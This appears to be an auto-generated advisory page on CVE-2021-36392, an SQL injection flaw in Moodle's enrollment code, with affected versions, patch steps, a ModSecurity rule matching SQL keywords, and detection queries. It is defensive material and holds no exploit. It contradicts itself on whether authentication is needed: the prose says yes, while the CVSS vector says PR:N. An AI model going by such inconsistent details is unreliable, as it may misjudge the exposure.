CVE-2021-36392 – CVE-2021-36392 is a critical SQL injection vuln... (How to Fix)

Q: What is the severity of CVE-2021-36392?

CVE-2021-36392 has a CVSS score of 9.8 (CRITICAL). CVE-2021-36392 is a critical SQL injection vulnerability in Moodle's user enrollment library that allows attackers to execute arbitrary SQL queries. This affects all Moodle instances with vulnerable versions, potentially compromising user data and system integrity. Attackers could access, modify, or delete database content through this flaw.

📋 TL;DR

CVE-2021-36392 is a critical SQL injection vulnerability in Moodle's user enrollment library that allows attackers to execute arbitrary SQL queries. This affects all Moodle instances with vulnerable versions, potentially compromising user data and system integrity. Attackers could access, modify, or delete database content through this flaw.

💻 Affected Systems

Products:

Moodle

Versions: Moodle 3.9 to 3.9.7, 3.10 to 3.10.4, 3.11 to 3.11.1

Operating Systems: All operating systems running Moodle (Linux, Windows, macOS)

Default Config Vulnerable: ⚠️ Yes

Notes: All Moodle installations within affected version ranges are vulnerable regardless of configuration. The vulnerability exists in core Moodle code.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete database compromise leading to data theft, manipulation, or deletion; potential privilege escalation to administrative access; possible remote code execution through database functions.

🟠

Likely Case

Unauthorized access to sensitive user information (grades, personal data, course materials); manipulation of enrollment records; potential access to other users' data.

🟢

If Mitigated

Limited impact with proper input validation and parameterized queries; database permissions limiting damage scope; web application firewalls blocking malicious SQL patterns.

🌐 Internet-Facing: HIGH - Moodle instances are typically internet-facing learning management systems accessible to users worldwide, making them prime targets for exploitation.

🏢 Internal Only: MEDIUM - Even internally hosted Moodle instances face risk from insider threats or compromised internal accounts, though attack surface is reduced.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires authenticated access to Moodle. SQL injection vulnerabilities are well-understood and frequently weaponized. Public discussions include technical details that could facilitate exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Moodle 3.9.8, 3.10.5, 3.11.2

Vendor Advisory: https://moodle.org/mod/forum/discuss.php?d=424797

Restart Required: No

Instructions:

1. Backup your Moodle database and files. 2. Update to patched version via Moodle's admin interface or manual upgrade. 3. Verify the update completed successfully. 4. Test core functionality after patching.

🔧 Temporary Workarounds

Input Validation Enhancement

all

Implement additional input validation for user enrollment parameters

Not applicable - requires code modification

Web Application Firewall Rules

linux

Deploy WAF rules to detect and block SQL injection patterns

# Example ModSecurity rule: SecRule ARGS "(?i)(union|select|insert|update|delete|drop|--|#)" "id:1001,phase:2,deny,status:403,msg:'SQL Injection Attempt'

🧯 If You Can't Patch

Implement strict database user permissions limiting write/delete operations
Enable detailed SQL query logging and monitor for suspicious patterns

🔍 How to Verify

Check if Vulnerable:

Check Moodle version via admin interface or config.php: $CFG->version value. Compare against affected versions.

Check Version:

php -r "require_once('config.php'); echo 'Moodle version: ' . $CFG->version;"

Verify Fix Applied:

Verify version is 3.9.8+, 3.10.5+, or 3.11.2+. Test enrollment functionality works normally without errors.

📡 Detection & Monitoring

Log Indicators:

Unusual SQL query patterns in database logs
Multiple failed enrollment attempts with malformed parameters
Unexpected database errors in Moodle logs

Network Indicators:

HTTP requests with SQL keywords in enrollment parameters
Unusual database connection patterns from web server

SIEM Query:

source="moodle_logs" AND ("SQL error" OR "database error") AND "enrol"

📊 Metadata

CVE ID: CVE-2021-36392

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-89

Published: March 6, 2023

Last Updated: November 21, 2024

🔗 References

https://moodle.org/mod/forum/discuss.php?d=424797 Patch,Vendor Advisory
https://moodle.org/mod/forum/discuss.php?d=424797 Patch,Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2021-36392, you might also want to check these:

📋 TL;DR

💻 Affected Systems

📦 What is this software?

Moodle by Moodle

Moodle by Moodle

Moodle by Moodle

⚠️ Risk & Real-World Impact

Worst Case

Likely Case

If Mitigated

🎯 Exploit Status

🛠️ Fix & Mitigation

✅ Official Fix

Instructions:

🔧 Temporary Workarounds

Input Validation Enhancement

Web Application Firewall Rules

🧯 If You Can't Patch

🔍 How to Verify

Check if Vulnerable:

Check Version:

Verify Fix Applied:

📡 Detection & Monitoring

Log Indicators:

Network Indicators:

SIEM Query:

📊 Metadata

🔗 References

📤 Share & Export

🔗 Related Vulnerabilities